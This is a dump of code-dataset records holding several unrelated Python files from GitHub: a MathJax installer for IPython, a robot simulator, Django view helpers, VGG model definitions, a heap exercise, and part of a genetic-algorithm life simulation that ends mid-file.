software.\n#-----------------------------------------------------------------------------\n\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\n\nimport argparse\nimport os\nimport shutil\nimport sys\nimport tarfile\nimport zipfile\n\nfrom IPython.paths import get_ipython_dir\n\ntry:\n from urllib.request import urlopen # Py 3\nexcept ImportError:\n from urllib2 import urlopen\n\n#-----------------------------------------------------------------------------\n#\n#-----------------------------------------------------------------------------\n\n# Where mathjax will be installed\n\nnbextensions = os.path.join(get_ipython_dir(), 'nbextensions')\ndefault_dest = os.path.join(nbextensions, 'mathjax')\n\n# Test for access to install mathjax\n\ndef prepare_dest(dest, replace=False):\n \"\"\"prepare the destination folder for mathjax install\n \n Returns False if mathjax appears to already be installed and there is nothing to do,\n True otherwise.\n \"\"\"\n \n parent = os.path.abspath(os.path.join(dest, os.path.pardir))\n if not os.path.exists(parent):\n os.makedirs(parent)\n \n if os.path.exists(dest):\n if replace:\n print(\"removing existing MathJax at %s\" % dest)\n shutil.rmtree(dest)\n return True\n else:\n mathjax_js = os.path.join(dest, 'MathJax.js')\n if not os.path.exists(mathjax_js):\n raise IOError(\"%s exists, but does not contain MathJax.js\" % dest)\n print(\"%s already exists\" % mathjax_js)\n return False\n else:\n return True\n\n\ndef extract_tar(fd, dest):\n \"\"\"extract a tarball from filelike `fd` to destination `dest`\"\"\"\n # use 'r|gz' stream mode, because socket file-like objects can't seek:\n tar = tarfile.open(fileobj=fd, mode='r|gz')\n\n # The first entry in the archive is the top-level dir\n topdir = tar.firstmember.path\n\n # extract the archive (contains a single directory) to the destination directory\n parent = os.path.abspath(os.path.join(dest, os.path.pardir))\n tar.extractall(parent)\n\n # it will be mathjax-MathJax-, rename to just mathjax\n os.rename(os.path.join(parent, topdir), dest)\n\n\ndef extract_zip(fd, dest):\n \"\"\"extract a zip file from filelike `fd` to destination `dest`\"\"\"\n z = zipfile.ZipFile(fd, 'r')\n\n # The first entry in the archive is the top-level dir\n topdir = z.namelist()[0]\n\n # extract the archive (contains a single directory) to the static/ directory\n parent = os.path.abspath(os.path.join(dest, os.path.pardir))\n z.extractall(parent)\n\n # it will be mathjax-MathJax-, rename to just mathjax\n os.rename(os.path.join(parent, topdir), dest)\n\n\ndef install_mathjax(tag='2.4.0', dest=default_dest, replace=False, file=None, extractor=extract_tar):\n \"\"\"Download and/or install MathJax for offline use.\n\n This will install mathjax to the nbextensions dir in your IPYTHONDIR.\n\n MathJax is a ~15MB download, and ~150MB installed.\n\n Parameters\n ----------\n\n replace : bool [False]\n Whether to remove and replace an existing install.\n dest : str [IPYTHONDIR/nbextensions/mathjax]\n Where to install mathjax\n tag : str ['2.4.0']\n Which tag to download. Default is '2.4.0', the current stable release,\n but alternatives include 'v1.1a' and 'master'.\n file : file like object [ defualt to content of https://github.com/mathjax/MathJax/tarball/#{tag}]\n File handle from which to untar/unzip/... mathjax\n extractor : function\n Method to use to untar/unzip/... `file`\n \"\"\"\n try:\n anything_to_do = prepare_dest(dest, replace)\n except OSError as e:\n print(\"ERROR %s, require write access to %s\" % (e, dest))\n return 1\n else:\n if not anything_to_do:\n return 0\n\n if file is None:\n # download mathjax\n mathjax_url = \"https://github.com/mathjax/MathJax/archive/%s.tar.gz\" %tag\n print(\"Downloading mathjax source from %s\" % mathjax_url)\n response = urlopen(mathjax_url)\n file = response.fp\n\n print(\"Extracting to %s\" % dest)\n extractor(file, dest)\n return 0\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"\"\"Install mathjax from internet or local archive\"\"\",\n )\n\n parser.add_argument(\n '-i',\n '--install-dir',\n default=nbextensions,\n help='custom installation directory. Mathjax will be installed in here/mathjax')\n\n parser.add_argument(\n '-d',\n '--print-dest',\n action='store_true',\n help='print where mathjax would be installed and exit')\n parser.add_argument(\n '-r',\n '--replace',\n action='store_true',\n help='Whether to replace current mathjax if it already exists')\n parser.add_argument('filename',\n help=\"the local tar/zip-ball filename containing mathjax\",\n nargs='?',\n metavar='filename')\n\n pargs = parser.parse_args()\n\n dest = os.path.join(pargs.install_dir, 'mathjax')\n\n if pargs.print_dest:\n print(dest)\n return\n\n # remove/replace existing mathjax?\n replace = pargs.replace\n\n # do it\n if pargs.filename:\n fname = pargs.filename\n\n # automatically detect zip/tar - could do something based\n # on file content, but really not cost-effective here.\n if fname.endswith('.zip'):\n extractor = extract_zip\n else :\n extractor = extract_tar\n # do it\n return install_mathjax(file=open(fname, \"rb\"), replace=replace, extractor=extractor, dest=dest)\n else:\n return install_mathjax(replace=replace, dest=dest)\n\n\nif __name__ == '__main__' :\n sys.exit(main())\n\n__all__ = ['install_mathjax', 'main', 'default_dest']\n","repo_name":"pyparallel/pyparallel","sub_path":"Lib/site-packages/ipython-4.0.0-py3.3.egg/IPython/external/mathjax.py","file_name":"mathjax.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","stars":579,"dataset":"github-code","pt":"67"} +{"seq_id":"34966714516","text":"NORTH = \"NORTH\"\nEAST = \"EAST\"\nWEST = \"WEST\"\nSOUTH = \"SOUTH\"\n\n\nclass robot():\n\n def __int__(self):\n print(\"hello I am checking the initial configuration\")\n\n def __init__(self, x=0, y=0, direction=\"NORTH\"):\n self.x = x\n self.y = y\n self.direction = direction\n self.directions = [\"EAST\", \"SOUTH\", \"WEST\", \"NORTH\"]\n\n def turn_right(self):\n try:\n self.direction = self.directions[self.get_index() + 1]\n except:\n self.direction = self.directions[0]\n return self.direction\n\n def turn_left(self):\n try:\n self.direction = self.directions[self.get_index() - 1]\n except:\n self.direction = self.directions[3]\n return self.direction\n\n def move(self):\n\n if (self.direction == NORTH):\n self.y += 1\n elif (self.direction == EAST):\n self.x += 1\n elif (self.direction == WEST):\n self.x -= 1\n elif (self.direction == SOUTH):\n self.y -= 1\n return self.x, self.y\n\n def check_initial_placement(self):\n x = self.x\n y = self.y\n\n if (x > 5 or y >5 ) or (x < 0 or y <0 ):\n print (\"=== robot is not placed on right dimension ==\")\n return False\n else:\n return True\n\n def decision_maker(self, command):\n if command == \"MOVE\":\n if (not self.check_if_robot_is_falling()):\n self.move()\n else:\n print(\"Robot is falling in this move, hence skipping and moving to next one\", self.x, self.y)\n\n if command == \"LEFT\":\n self.turn_left()\n\n if command == \"RIGHT\":\n self.turn_right()\n\n def check_if_robot_is_falling(self):\n \"\"\"\n This command is used to check if robot is falling from surface or not\n :return:\n \"\"\"\n if (self.direction == NORTH):\n if (self.y + 1 > 5):\n return True\n else:\n return False\n if (self.direction == SOUTH):\n if (self.y - 1 <= -1):\n return True\n else:\n return False\n if (self.direction == EAST):\n if (self.x + 1 > 5):\n return True\n else:\n return False\n\n if (self.direction == WEST):\n if (self.x - 1 <= -1):\n return True\n else:\n return False\n\n def get_index(self):\n return self.directions.index(self.direction)\n\n","repo_name":"prajjwal531/RobotSimulator","sub_path":"robotSimulator/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34244858321","text":"from django.shortcuts import render\nfrom rest_framework.renderers import JSONRenderer\n\njson_renderer = JSONRenderer()\n\ndef render_application(request, *, \n scripts, sub_title, app_context=None, init_menu_key=None,\n status=200\n):\n context={\n 'user': request.user,\n 'scripts': scripts,\n 'sub_title': sub_title\n }\n\n if app_context is not None:\n context['app_context'] = json_renderer.render(app_context).decode(\"utf-8\")\n \n if init_menu_key is not None:\n context['init_menu_key'] = init_menu_key\n\n return render(\n request,\n 'application.html',\n context=context,\n status=status\n )\n\ndef render_application_error(request, *, status, message, subject=None):\n return render_application(\n request, \n scripts = ['/static/js-bundle/error.js'], \n sub_title='Error',\n app_context={\n \"subject\": subject or status,\n \"message\": message\n },\n status=status\n )\n\n","repo_name":"stonezhong/sparkbase","sub_path":"server/ui/view_tools.py","file_name":"view_tools.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"47889426088","text":"#coding:utf-8\nimport torch\nimport torch.nn as nn\n\ncfg = {\n 'vgg11':[64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n 'vgg13':[64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],\n 'vgg16':[64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],\n 'vgg19':[64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],\n}\n\ndef VGG11(num_classes):\n return VGG('vgg11', num_classes)\n\ndef VGG13(num_classes):\n return VGG('vgg13', num_classes)\n\ndef VGG16(num_classes):\n return VGG('vgg16', num_classes)\n\ndef VGG19(num_classes):\n return VGG('vgg19', num_classes)\n\nclass VGG(nn.Module):\n\n def __init__(self, vgg_name, num_classes):\n super(VGG, self).__init__()\n self.features = self._make_layers(cfg[vgg_name])\n self.fc1 = nn.Linear(512, num_classes)\n\n def forward(self, x):\n out = self.features(x)\n out = out.view(out.size(0), -1)\n return self.fc1(out)\n\n def _make_layers(self, cfg):\n layers = []\n in_channels = 3\n for x in cfg:\n if x == 'M':\n layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n else:\n layers += [nn.Conv2d(in_channels, x, kernel_size=3, padding=1),\n nn.BatchNorm2d(x),\n nn.ReLU(inplace=True)]\n in_channels = x\n layers += [nn.AvgPool2d(kernel_size=1, stride=1)]\n return nn.Sequential(*layers)\n\ndef test():\n print('--- run vgg test ---')\n x = torch.randn(2,3,32,32)\n for net in [VGG11(10), VGG13(10), VGG16(10), VGG19(10)]:\n print(net)\n y = net(x)\n print(y.size())\n\n","repo_name":"iBelieveCJM/Tricks-of-Semi-supervisedDeepLeanring-Pytorch","sub_path":"architectures/vgg.py","file_name":"vgg.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":426,"dataset":"github-code","pt":"67"} +{"seq_id":"69957076375","text":"import queue\n\nn = int(input())\na = list(map(int,input().split()))\n##first = -1\n##second = -1\n##third = -1\n##for i in range(len(a)):\n## cur = a[i]\n## if (cur > first):\n## third = second\n## second = first\n## first = cur\n## elif (cur > second):\n## third = second\n## second = cur\n## elif (cur > third):\n## third = cur\n## if (i < 2):\n## print(-1)\n## else:\n## print(first * second * third)\npq = queue.PriorityQueue()\nfor x in a:\n pq.put(-x)\nfor i in range(n):\n if (i < 2):\n print(-1)\n continue\n first = pq.get()\n second = pq.get()\n third = pq.get()\n print(-1*first*second*third)\n pq.put(first)\n pq.put(second)\n pq.put(third)\n","repo_name":"lamngue/Programming-Questions","sub_path":"Heap/MonkAndMultiplication.py","file_name":"MonkAndMultiplication.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16640169459","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jul 16 21:15:50 2019\r\n\r\n@author: Simon\r\n\"\"\"\r\nstart = time.time()\r\nimport numpy as np\r\nimport numexpr as ne\r\nimport time\r\nimport pygame\r\n\r\nimport pyautogui\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\n\r\nimport math\r\nimport random\r\n\r\nimport brain as br\r\nimport new_Dense as nd\r\nimport new_Dense_fitness as nd_F\r\n\r\n\r\n\r\n\r\nclass Genetic:\r\n def __init__( self, H, H2, NR_CH, MUTATION_COEFF, TRAINING):\r\n self.NR_CH = NR_CH \r\n self.H = H\r\n self.H2 = H2\r\n self.MUTATION_COEFF = MUTATION_COEFF\r\n self.TRAINING = TRAINING\r\n \r\n \r\n CH_W, CH_B, CH_money, CH_edu, CH_food, CH_fitness, CH_breed, CH_age = self.define_char(H, NR_CH)\r\n self.CH_W = CH_W\r\n self.CH_B = CH_B\r\n self.CH_money = CH_money\r\n self.CH_edu = CH_edu\r\n self.CH_food = CH_food\r\n self.CH_fitness = CH_fitness\r\n self.CH_breed = CH_breed\r\n self.CH_age = CH_age\r\n \r\n ###################\r\n ###### Breed ######\r\n ###################\r\n \"Weights determine whom gets to breed\"\r\n CH_W_2, CH_B_2, _, _, _, _, _, _ = self.define_char(H2, NR_CH, CH_W = [], CH_B = [], CH_money = [],\r\n CH_edu = [], CH_food = [], CH_fitness = [], CH_breed = [], CH_age=[])\r\n \r\n self.CH_W_2 = CH_W_2\r\n self.CH_B_2 = CH_B_2\r\n self.Breed_point = [0] * len(CH_W) #Each character earns a breed point if someone wants to breed with this character\r\n \r\n #####################\r\n ###### Fitness ######\r\n #####################\r\n self.H_3 = [6,1]\r\n CH_W_3, CH_B_3, _, _, _, _, _, _ = self.define_char(self.H_3, NR_CH, CH_W = [], CH_B = [], CH_money = [],\r\n CH_edu = [], CH_food = [], CH_fitness = [], CH_breed = [], CH_age=[])\r\n self.CH_W_3 = np.array(CH_W_3[0])\r\n self.CH_B_3 = np.array(CH_B_3[0])\r\n \r\n self.Fitness_old = [0]*NR_CH\r\n self.Fitness_new = 0\r\n \r\n self.fot = []\r\n \r\n ######################\r\n ##### Investment #####\r\n ######################\r\n self.invest = 0 #Default\r\n \r\n #####################\r\n ##### Statistic #####\r\n #####################\r\n self.TOPOP = []\r\n self.MAXM = []\r\n self.MAXE = []\r\n self.MAXFO = []\r\n self.historical_breed_point = []\r\n self.dec = []\r\n self.total_born = []\r\n self.old_pop = 0\r\n self.avg_age = []\r\n\r\n self.death_by_hunger = []\r\n self.death_by_age = []\r\n \r\n def define_char(self,H, NR_CH, CH_W = [], CH_B = [], CH_money = [],\r\n CH_edu = [], CH_food = [], CH_fitness = [], CH_breed = [], CH_age=[] ):\r\n #print(CH_W, \"hi\")\r\n start_len = len(CH_W)\r\n #print(\"length of W:\",start_len)\r\n for k in range(self.NR_CH):\r\n \r\n if start_len==0: #If empty then create new weights and biases\r\n \r\n W = [] #Create NR_CH different neural weights \r\n B = [] #Create the bias\r\n for i in range( len(H)-1): #creates 3 weight matrices\r\n W.append( np.random.random((H[i+1],H[i]))*2 -1 )\r\n #B.append( np.random.random(H[i+1])*2 -1)\r\n B.append( np.random.random((H[i+1],1))*2 -1)\r\n #creates weight matrices with weights between -1 and 1\r\n \r\n CH_W.append( W )\r\n CH_B.append( B )\r\n else:\r\n pass\r\n CH_money.append( 0 ) #All characters start with 10 credits, 0 education, 7 days worth of food and 0 fitness\r\n CH_edu.append( 0 ) \r\n CH_food.append( 200 )\r\n CH_fitness.append( 0 )\r\n CH_breed.append(0)\r\n CH_age.append(0)\r\n return CH_W, CH_B, CH_money, CH_edu, CH_food, CH_fitness, CH_breed, CH_age\r\n \r\n\r\n \r\n \r\n #def update_frame(i, POS, NR_CH):\r\n def play_game(self, t): #One character performs one update to its life\r\n #print(\"Character:\", s)\r\n H_act = [\"tanh\"] + [\"I\"]\r\n\r\n og_len = len(self.CH_food)\r\n Survived_W = []\r\n Survived_W_2 =[]\r\n Survived_B = []\r\n Survived_B_2 = []\r\n Survived_edu = []\r\n Survived_money = []\r\n Survived_food = []\r\n Survived_fitness = []\r\n Survived_age=[]\r\n Survived_breed=[]\r\n \r\n breed = 0\r\n school = 0\r\n work = 0\r\n buy = 0\r\n invest = 0\r\n nr_dead = 0\r\n \r\n train = 0\r\n \r\n print(\"Number of characters alive:\",og_len, \"... Time:\", t)\r\n print(\"lowest food:\", min(self.CH_food))\r\n print(\"We have invested: \", self.invest)\r\n for i in range(og_len):\r\n #print(i, \"Food:\", self.CH_food[i])\r\n \r\n if og_len==0:\r\n print(\"We're all dead!\")\r\n \r\n random_nr = int( np.random.normal(0) ) *10\r\n if self.CH_food[i] > 0 and self.CH_age[i] < 200 + random_nr:\r\n #print(\"Food:\", self.CH_food[i], i)\r\n \r\n temp = np.reshape( self.CH_W_3 , (6,1) )\r\n x = np.array([[self.CH_money[i], self.CH_edu[i], self.CH_food[i],self.invest, self.CH_age[i] ]]).T #Must be a N x 1 matrix\r\n x = np.concatenate((x, np.tanh(temp / np.average(temp)) ))\r\n \r\n x = np.reshape( x , (5+6,1) )\r\n \r\n z,choices = nd_F.feedforward(1,x, self.H, self.CH_W[i], self.CH_B[i],0, H_act)\r\n \r\n max_choice = max(choices[-1])\r\n \r\n ''' Characters choice will be taken into consideration\r\n with the importance of the s.CH_W_3 weights\r\n '''\r\n \r\n \r\n #print(max_choice, \"Choice\")\r\n if max_choice == choices[-1][0]: #First option: Go to school\r\n #print(\"Go to school\")\r\n self.CH_edu[i]+=1 #+ int( self.invest / 20 )\r\n school += 1\r\n \r\n if max_choice == choices[-1][1]: #Second option: Go to work\r\n #print(\"Go to work\")\r\n self.CH_money[i]+=2*self.CH_edu[i] +5\r\n work += 1\r\n \r\n if self.CH_edu[i] == 0:\r\n train = 1\r\n y = np.array([[1,0,0,0,0 ]]).T #We dont want the final entry to happen during this input of A\r\n\r\n \r\n elif max_choice == choices[-1][2] and self.CH_money[i] > 0: #Third option: Buy groceries\r\n self.CH_food[i] += 10 #+ int( self.invest / 20 ) #Every 10 investment points will increase food by one\r\n self.CH_money[i]-=1\r\n buy += 1\r\n \r\n elif max_choice == choices[-1][3] and self.CH_age[i]>5: #Fourth option: Breed, but only for mature enough individuals\r\n self.CH_fitness[i] += 1\r\n self.CH_breed[i] = 1 #Boolean, true or false\r\n breed += 1\r\n \r\n \r\n elif max_choice == choices[-1][4]: #Fifth option: Invest\r\n if self.CH_money[i] > 0:\r\n self.CH_money[i] -= 1\r\n self.Breed_point[ i ] += 10 #Those whom invests will gain fitness, increasing their chances of breeding\r\n self.invest += 1\r\n invest += 1\r\n# else:\r\n# y = np.array([[self.CH_money[i], self.CH_edu[i], self.CH_food[i],0,t]]).T #We dont want the final entry to happen during this input of A\r\n# for j in range(5):\r\n# self.CH_W[i], self.CH_B[i], _, _, _, _ = nd.backpropagation(self.H, choices, z, y, self.CH_W[i], self.CH_B[i], C=0, vs=0,lr=0.01,s=0,H_act=H_act, optimizer='none')\r\n# z,A = nd.feedforward(1,x, self.H, self.CH_W[i], self.CH_B[i], drop=0,H_act=H_act)\r\n \r\n else:\r\n \"The AI attempted to do one of the resource intensive objects\"\r\n train = 1\r\n y = np.array([[1,1,1,0,0]]).T\r\n\r\n if train == 1:\r\n train = 0\r\n for j in range(1):\r\n \r\n self.CH_W[i], self.CH_B[i], _ =\\\r\n nd_F.backpropagation(self.H, choices, z, y, self.CH_W[i], self.CH_B[i], C=0, vs=0,lr=0.01,s=0,H_act=H_act, optimizer='none')\r\n \r\n z,A = nd_F.feedforward(1,x, self.H, self.CH_W[i], self.CH_B[i], drop=0,H_act=H_act)\r\n \r\n \r\n \r\n self.CH_food[i]-=1 #Each day reduces food supplies by one\r\n if self.CH_food[i] > 0:\r\n self.CH_age[i]+=1\r\n \r\n if self.CH_age[i] >= 200 + random_nr:\r\n self.death_by_age[-1] += 1\r\n \r\n else:\r\n Survived_W_2.append( self.CH_W_2[i])\r\n Survived_B_2.append( self.CH_B_2[i])\r\n Survived_W.append( self.CH_W[i] )\r\n Survived_B.append( self.CH_B[i] )\r\n Survived_money.append( self.CH_money[i] )\r\n Survived_edu.append( self.CH_edu[i] )\r\n Survived_food.append( self.CH_food[i] )\r\n Survived_fitness.append( self.CH_fitness[i] )\r\n Survived_age.append(self.CH_age[i])\r\n #Survived_breed_point etc..\r\n \r\n \r\n else:\r\n pass\r\n #print(\"Character\", i, \" death by hunger\")\r\n nr_dead += 1\r\n self.death_by_hunger[-1] += 1\r\n else:\r\n print(\"Character\", i, \" was dead\")\r\n if self.CH_age[i] >= 200 + random_nr:\r\n print(\"You died of old age\")\r\n \r\n if self.CH_food[i] <=0:\r\n print(\"You died of hunger...\")\r\n \r\n print(\"Number of survivors:\",len(Survived_W))\r\n# print(\"School: \", school)\r\n# print(\"Work: \", work)\r\n# print(\"Buy: \", buy)# / (og_len*5))\r\n# print(\"Breed: \", breed)# / (og_len*5))\r\n# print(\"Invest: \", invest)# / (og_len*5))\r\n# print(\"Death by hunger: \", nr_dead)\r\n self.old_pop = len(self.CH_food)\r\n \r\n return Survived_W, Survived_B, Survived_W_2, Survived_B_2, Survived_money, \\\r\n Survived_edu, Survived_food, Survived_fitness, Survived_age, Survived_breed\r\n \r\n ##########################\r\n ##### Breed selector #####\r\n ##########################\r\n def breed_selector(self,Survived_W, Survived_B, Survived_W_2, Survived_B_2, Survived_money,Survived_edu, Survived_food, Survived_fitness, Survived_age, Survived_breed):\r\n \r\n H_act=[\"relu\"] + [\"I\"]\r\n Survived_breed=[]\r\n #print(len(Survived_W), \"number of survivors\")\r\n \r\n #Compile a list of potential breeders and create new characters\r\n #-Call function to breed\r\n NR_CH = len(Survived_W)\r\n \r\n NR_children = 0\r\n breed_list = [ i for i in range(NR_CH) if self.CH_breed[i]==1 ]\r\n if sum( self.CH_breed) >= 2:\r\n #print(breed_list)\r\n nr_children = int(len(breed_list)/2)\r\n #print(nr_children, \"number of children\")\r\n \r\n \r\n #New neural network for each character\r\n #Each character will decide whom to breed with\r\n #inputs, food,money,edu etc,\r\n #output: one neuron which decides whom to breed with\r\n \r\n avg_fd = 0\r\n ch_born = 0\r\n \r\n #print(breed_list, \"breed_list\")\r\n \r\n x_1 = np.array([ self.CH_money[i] for i in breed_list ])\r\n x_2 = np.array([ self.CH_food[i] for i in breed_list ])\r\n x_3 = np.array([ self.CH_edu[i] for i in breed_list ])\r\n \r\n #print(\"RATIO OF BREEDERS:\", len(x_1) / len(self.CH_money))\r\n # print(x_1)\r\n # print(x_2)\r\n # print(x_3)\r\n # print(nr_children, \"nr ch\")\r\n self.dec=[]\r\n for J in range(len(breed_list)): #Finish later\r\n \r\n x = np.array([ x_1, x_2, x_3 ]) #Must be a 3 x N matrix, N = nr of potential breeders\r\n z,choices = nd_F.feedforward(1,x, self.H2, self.CH_W_2[J], self.CH_B_2[J],0, H_act)\r\n \r\n #print(choices[-1][0], \"Your choices\")\r\n breeding_choice = numpy.where(choices[-1][0] == np.amax(choices[-1][0]))\r\n \r\n #print(\"Breeding pos of breed_list\",breeding_choice[0][0])\r\n chosen_ch = breed_list[int( breeding_choice[0][0] )]\r\n #print(\"Your desired breeding partner is character number: \", breed_list[int( breeding_choice[0][0] )])\r\n \r\n self.Breed_point[ chosen_ch ] += 1 #+ self.CH_fitness[ chosen_ch ]\r\n \r\n self.dec.append(choices[-1][0] )\r\n First = numpy.where( self.Breed_point == np.amax( self.Breed_point ))[0][0]\r\n Second = self.get_second_highest()[1]\r\n \r\n #print(First, Second)\r\n #print(self.Breed_point)\r\n par1 = First #breed_list[First] #First parent to breed\r\n par2 = Second #breed_list[Second] #second parent to breed\r\n \r\n \"Make it so that the parents can decide how many children will be born\"\r\n NR_children = 4 + int(self.invest / 20) #Each parent breeds a number of children\r\n NR_children = min( NR_children , 10) #Max 10 children. \r\n #print(\"NR of children born:\" , NR_children)\r\n for J in range(NR_children): #How many children do you want each pair to make\r\n \r\n #The first weights\r\n children_W, children_B = br.breed( self.CH_W[par1], self.CH_W[par2], self.CH_B[par1], self.CH_B[par2], 1, self.MUTATION_COEFF, self.H )\r\n \r\n #The second weights\r\n children_W_2, children_B_2 = br.breed( self.CH_W_2[par1], self.CH_W_2[par2], self.CH_B_2[par1], self.CH_B_2[par2], 1, self.MUTATION_COEFF, self.H2 )\r\n \r\n Survived_W.append( children_W[0] )\r\n Survived_B.append( children_B[0])\r\n \r\n Survived_W_2.append( children_W_2[0] )\r\n Survived_B_2.append( children_B_2[0] )\r\n \r\n Survived_money.append( 0 ) #All characters start with 10 credits, 0 education, 7 days worth of food and 0 fitness\r\n Survived_edu.append( 0 ) \r\n \r\n food_to_give = 20#int( self.CH_food[par1] *0.5 + self.CH_food[par2]*0.5 )\r\n #self.CH_food[par1] -= int( self.CH_food[par1] *0.5 )\r\n #self.CH_food[par2] -= int( self.CH_food[par2] *0.5 )\r\n self.CH_food[par1] -= 10\r\n self.CH_food[par2] -= 10\r\n Survived_food.append( food_to_give )\r\n #print(\"Give food for children:\", food_to_give)\r\n Survived_fitness.append( 0 )\r\n Survived_breed.append(0)\r\n Survived_age.append(0)\r\n \r\n self.total_born[-1] += 1\r\n \r\n \r\n \r\n avg_fd+=food_to_give #/ nr_children\r\n else:\r\n print(\"No children this round...\")\r\n \r\n \r\n \r\n ch_born = NR_children\r\n #maxe = max(CH_edu)\r\n maxm = 0#max(CH_money)\r\n maxf = 0#avg_fd\r\n maxfo = ch_born\r\n\r\n \r\n self.CH_W = Survived_W\r\n self.CH_B = Survived_B\r\n self.CH_W_2 = Survived_W_2\r\n self.CH_B_2 = Survived_B_2\r\n self.CH_edu = Survived_edu\r\n self.CH_age = Survived_age\r\n self.CH_money = Survived_money\r\n self.CH_food = Survived_food\r\n self.CH_fitness = Survived_fitness\r\n #print(NR_CH, \"BEFORE\")\r\n self.CH_breed = [0]*len(Survived_W)\r\n #print(len(self.CH_breed), \"AFTER\")\r\n self.hs = self.Breed_point\r\n #print(self.CH_food)\r\n #print(self.Breed_point)\r\n self.Breed_point = [0]*len(Survived_age)\r\n \r\n \r\n return Survived_W, Survived_B, Survived_money, \\\r\n Survived_edu, Survived_food, Survived_fitness, Survived_age, 0, maxm, maxf,maxfo \r\n \r\n \r\n def get_second_highest(self):\r\n a = self.Breed_point\r\n hi = mid = 0\r\n mid_pos = 0\r\n for index, x in enumerate(a):\r\n if x > hi:\r\n mid = hi\r\n hi = x\r\n mid_pos = index-1\r\n #print(mid)\r\n elif x < hi and x > mid:\r\n #lo = mid\r\n mid = x\r\n mid_pos = index\r\n #print(mid, hi, index)\r\n return mid, mid_pos\r\n \r\n #def start_game(NR_CH, H, CH_W, CH_B, MUTATION_COEFF ,TRAINING, CH_money, CH_edu, CH_food, CH_fitness, CH_breed, CH_age ):\r\n def start_game(self ):\r\n T = 1000 #timesteps\r\n MAXE=[]\r\n MAXM=[]\r\n MAXF=[]\r\n MAXFO=[]\r\n TOPOP=[len(self.CH_W)]\r\n old_nr_ch = TOPOP[0]\r\n \r\n for t in range(T):\r\n print()\r\n print(\"Time\", t)\r\n self.total_born.append(0)\r\n \r\n self.death_by_age.append(0)\r\n self.death_by_hunger.append(0)\r\n \r\n if len(self.CH_food) == 0: #Extinction\r\n print(\"Extinction\")\r\n return 0, 0, 0, 0,0,1\r\n \r\n else:\r\n \r\n #######################\r\n ##### Day choices #####\r\n #######################\r\n #CH_W, CH_B, CH_money, CH_edu, CH_food, CH_fitness, CH_age, CH_breed \\\r\n #= play_game( H, CH_W, CH_B, CH_money, CH_edu, CH_food, CH_fitness, CH_breed, CH_age, t )\r\n \r\n \r\n #print(\"BEFORE GAME:\", old_nr_ch)\r\n Survived_W, Survived_B, Survived_W_2, Survived_B_2, Survived_money,Survived_edu, Survived_food, Survived_fitness, Survived_age, Survived_breed = self.play_game(t)\r\n nr_ch = len(Survived_W)\r\n #print(\"AFTER GAME:\", nr_ch)\r\n #######################################\r\n ###### Adaptive fitness function ######\r\n #######################################\r\n if len(Survived_W) <= 1:\r\n print(\"EXTINCTION\")\r\n return 0, 0, 0, 0,0,1\r\n \r\n big_f = [ ]\r\n big_F = [ [] , [] ]\r\n H_act = [ \"I\" ]\r\n \r\n for i in range(nr_ch):\r\n \r\n \"Add constraints here\"\r\n #self.CH_B_3[0][0][0][0] = 0\r\n \r\n '''Here we create the fitness output using the fitness function'''\r\n X = np.array([ [ Survived_money[i] ], [ Survived_food[i] ], [ Survived_fitness[i] ], [ Survived_edu[i] ] ,[ Survived_age[i] ], [0] ]) #0 is placeholder\r\n \r\n\r\n \r\n f,F = nd.feedforward(1, X , self.H_3, self.CH_W_3, self.CH_B_3,0, H_act)\r\n \r\n \r\n big_f.append(f)\r\n big_F[0].append(F[0])\r\n big_F[1].append(F[1])\r\n \r\n max_ch = max(nr_ch , old_nr_ch )\r\n min_ch = min(nr_ch , old_nr_ch )\r\n if old_nr_ch > nr_ch: #Some people died\r\n \"Add zeros to current fitness stats\"\r\n for k in range( old_nr_ch - nr_ch ):\r\n #print(\"here\")\r\n big_f.append([ np.zeros((6,1)) , np.zeros((1,1)) ]) # Add zeros here for dead or newborn entries ###\r\n big_F[0].append( np.zeros((6,1)) )\r\n big_F[1].append( np.zeros((1,1)) )\r\n \r\n if old_nr_ch <= nr_ch:\r\n \"Add zeros to previous fitness stats\"\r\n for k in range( nr_ch - old_nr_ch ):\r\n self.Fitness_old.append(0)\r\n #print(\"in here\")\r\n \r\n ''' End fitness forward function '''\r\n \r\n ''' Start fitness backward '''\r\n #Add zero entries for fallen/added people\r\n \r\n big_F0 = np.array(big_F[0]).T\r\n big_F0 = np.reshape(big_F0, (6,max_ch) ) #The input stats\r\n big_F1 = np.reshape( np.array(big_F[1]).T , (1,max_ch) ) #The output fitness\r\n \r\n new_f = [ np.reshape(big_f, (1,max_ch)) ] #Pre act of fitness\r\n new_F = [ big_F0 , big_F1 ] #post act\r\n \r\n \r\n Fitness_cost = [ self.Fitness_old , np.array(big_F1) ] #Fitness_old may have more entries than big_F1\r\n # due to deaths\r\n #print(nr_ch,old_nr_ch, np.shape(big_F1) , np.shape(self.Fitness_old) )\r\n \r\n \r\n self.Fitness_old = [big_F1[0,l] for l in range( len(Survived_W) ) ]\r\n \r\n \r\n \r\n \"Update fitness function\"\r\n self.CH_W_3, self.CH_B_3, _ = \\\r\n nd_F.backpropagation(self.H_3, new_F, new_f, np.ones((1,max_ch)) , self.CH_W_3, self.CH_B_3,lr=0.01,H_act=H_act,delta_class='', F=Fitness_cost, COST='fit')\r\n \r\n ''' Weights in self.CH_W_3 represents importance of stats in X\r\n 